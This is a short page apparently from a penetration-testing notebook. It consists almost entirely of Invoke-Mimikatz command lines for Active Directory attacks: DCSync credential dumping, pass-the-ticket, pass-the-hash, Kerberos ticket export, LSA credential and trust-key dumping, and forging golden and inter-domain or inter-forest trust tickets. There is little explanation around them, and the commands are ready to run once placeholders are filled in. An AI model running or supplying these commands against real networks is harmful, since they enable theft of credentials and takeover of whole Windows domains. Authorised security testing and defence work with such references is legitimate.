Mimikatz

DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\USER"'

Invoke-Mimikatz -Command '"lsadump::dcsync /all"'

# When DCsyncing and other actions you need to know the short hand of the domain.
# This can be found with Translate-Canonical
https://gist.github.com/HarmJ0y/4226349db644e6549605

Pass-The-Ticket

Invoke-Mimikatz -Command '"kerberos::ptt TGS_ticket_file.kirbi"'

Pass-The-Hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.local /ntlm:<ntlmhash> /run:powershell.exe"'

Extract Tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'

Dump Local Creds

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Extract Trust Keys

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc

Forge Golden Ticket

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Forge Inter-Domain Trust Ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-15-21-280534878-1496970234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'

Forge Inter-Forest Trust Ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETFOREST.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'

PreviousPersistance NextAlternate Cred Dumps

Last updated 5 years ago

Was this helpful?